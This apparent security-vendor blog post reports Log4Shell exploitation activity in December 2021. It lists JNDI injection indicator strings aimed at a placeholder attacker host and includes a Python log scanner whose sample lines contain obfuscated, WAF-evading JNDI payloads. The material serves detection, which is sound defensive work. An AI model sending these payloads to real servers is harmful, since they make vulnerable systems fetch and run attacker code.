
Log4Shell Active Exploitation Continues…

Latest Threat Activity and Fidelis Response


Key Developments | 17 December 2021

Multiple high-fidelity sources continue to report that cyber threat actors of various skill and motivation are leveraging this vulnerability to either deliver their primary payload (e.g., cryptocurrency mining malware) or establish initial access into the victim environment (e.g., Cobalt Strike), which will almost certainly lead to more intrusion chains of various sophistication. While we have yet to directly observe Cobalt Strike use, Fidelis Threat Research Team (TRT) has observed an exorbitant amount of Linux/Unix command shell injection in the week since the disclosure of the Log4shell vulnerability.

Cryptocurrency Miners

In a recent instance, Fidelis TRT observed exploitation attempts against an industry-leading technology manufacturer and services provider.
In many cases the attempts were NOT successful, but they followed an intrusion TTP identical to that reported in open-source channels for threat actors delivering cryptocurrency mining malware (Ref: Figures 1 and 2 below).

Figure 1. Log4shell exploitation attempts from actors most likely deploying cryptocurrency miners – source: Fidelis Telemetry

Figure 2. Log4shell exploitation attempts from actors most likely deploying cryptocurrency miners – image credit: BleepingComputer

Command Shell Injection

In numerous instances, Fidelis TRT observed attempts at *nix command shell injection following exploitation of Log4shell (Ref: Figures 3 and 4 below).
In many cases, this was NOT successful against the targeted servers under our purview.
However, impact in less securely configured environments is likely, since such commands would give the attacker command shell execution under the privilege context of the web server daemon.

Figure 3. Command shell injections following Log4shell, using WGET – source: Fidelis Telemetry

Figure 4. Command shell injections following Log4Shell, using CURL – source: Fidelis Telemetry

Fidelis Response

Fidelis TRT continues to enhance our detection logic primarily through direct collection and analysis of live attack telemetry data and broader observations through industry partnerships and vetted open-source intelligence.

In numerous instances this week, TRT observed threat actors attempting to subvert Web Application Firewalls (WAF). We are detecting and alerting on such attempts (Ref: Figure 5 below) and discovering threat actor TTP pivots using our logic.

Figure 5. Fidelis dynamic detection alert firing on WAF evasion (HTTP User-Agent) for Log4Shell – source: Fidelis Telemetry

Indicators


Network Relevant Strings

${jndi:ldap://badguyFQDN[OR]IPv4/*malicious_content*}
${jndi:ldap://badguyFQDN[OR]IPv4/Basic//*maliciousbase64_content*}
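As an added detection example (not Fidelis code), the scanner below flags the JNDI lookup strings listed above in web-server access logs, and also resolves nested Log4j lookups such as ${lower:j} or ${::-j} before matching, since that nesting is the usual way the plain ${jndi: signature is hidden from a WAF in a header like User-Agent (as in Figure 5). The access-log lines, the badguyFQDN host and the BASE64_PLACEHOLDER path are constructed placeholders, not observed telemetry.

```python
import re

# Constructed Apache-style access log lines (placeholders, not Fidelis telemetry).
SAMPLE_LOG = """\
10.0.0.5 - - [17/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [17/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://badguyFQDN/a}"
10.0.0.7 - - [17/Dec/2021:10:01:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://badguyFQDN/a}"
10.0.0.8 - - [17/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://badguyFQDN/Basic/BASE64_PLACEHOLDER}"
"""

# An innermost Log4j lookup: ${...} whose body contains no further ${ or }.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup once nesting is resolved; group 1 is the URI scheme (ldap, rmi, dns, ...).
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def _resolve(m) -> str:
    """Collapse one innermost lookup the way Log4j would; leave anything else as-is."""
    body = m.group(1)
    if ":-" in body:                       # ${x:-dflt}, ${env:NOPE:-dflt}, ${::-dflt} -> dflt
        return body.split(":-", 1)[1]
    key, sep, value = body.partition(":")
    if sep and key.lower() in ("lower", "upper"):   # ${lower:J} -> j, ${upper:j} -> J
        return value.lower() if key.lower() == "lower" else value.upper()
    return m.group(0)                      # e.g. the ${jndi:...} lookup itself


def normalize(s: str) -> str:
    """Resolve nested lookups from the inside out until the string stops changing."""
    while True:
        resolved = INNER_LOOKUP.sub(_resolve, s)
        if resolved == s:
            return s
        s = resolved


def scan_log(log_text: str) -> list:
    """Return one record per request whose logged fields carry a JNDI lookup."""
    hits = []
    for line in log_text.splitlines():
        m = JNDI_LOOKUP.search(normalize(line))
        if m:
            hits.append({
                "client": line.split()[0],
                "scheme": m.group(1).lower(),
                # True when the raw line evades the plain signature and only the
                # normalised form reveals the lookup (WAF-evasion style nesting).
                "obfuscated": JNDI_LOOKUP.search(line) is None,
            })
    return hits
```

Run `scan_log(SAMPLE_LOG)` to get one record per flagged request; the `obfuscated` flag is the useful triage signal, since a plain signature match and a nested-lookup match point at different attacker tooling.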

About Author

Rami Mizrahi

Rami Mizrahi is the Vice President of Research and Development for Deception at Fidelis Security. He has been leading the Deception R&D team for over six years, since the inception of TopSpin Security and through the acquisition by Fidelis Security. Prior to that, he led the WAF development team at Breach Security. Rami has over 20 years of experience in software development, specializing in enterprise security.
